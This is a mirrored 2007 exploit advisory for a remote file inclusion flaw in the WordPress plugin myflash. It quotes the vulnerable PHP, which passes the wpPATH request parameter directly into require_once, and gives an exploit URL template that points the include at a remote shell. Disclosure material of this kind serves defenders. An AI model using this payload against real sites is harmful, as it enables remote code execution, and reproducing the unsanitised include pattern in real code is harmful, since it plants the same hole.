Lucene search
myflash-rfi.txt
ποΈΒ 03 May 2007Β 00:00:00Reported byΒ Crackers_ChildTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 16Β Views
Wordpress plugin myflash vulnerability allows Remote File Inclusion (RFI) via wpPATH parameter in myflash-button.php, potentially allowing unauthorized file access
Show more
`--------------------------------- [ Oyle Kahpe Ki DΓΌnya ! ] --------------------------------------
Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: [email protected]
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application : Wordpress plugin
Web Site : http://alexrabe.boelinger.com/
--------------------------------------------------------------------------------
Vuln n myflash-button.php
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');
global $wpdb;
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
--------------------------------------------------------------------------------
greets:
Every Body
--------------------------------------------------------------------------------
--------------------------------- [http://www.biyosecurity.net ] --------------------------------------
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo03 May 2007 00:00Current
7.4High risk
Vulners AI Score7.4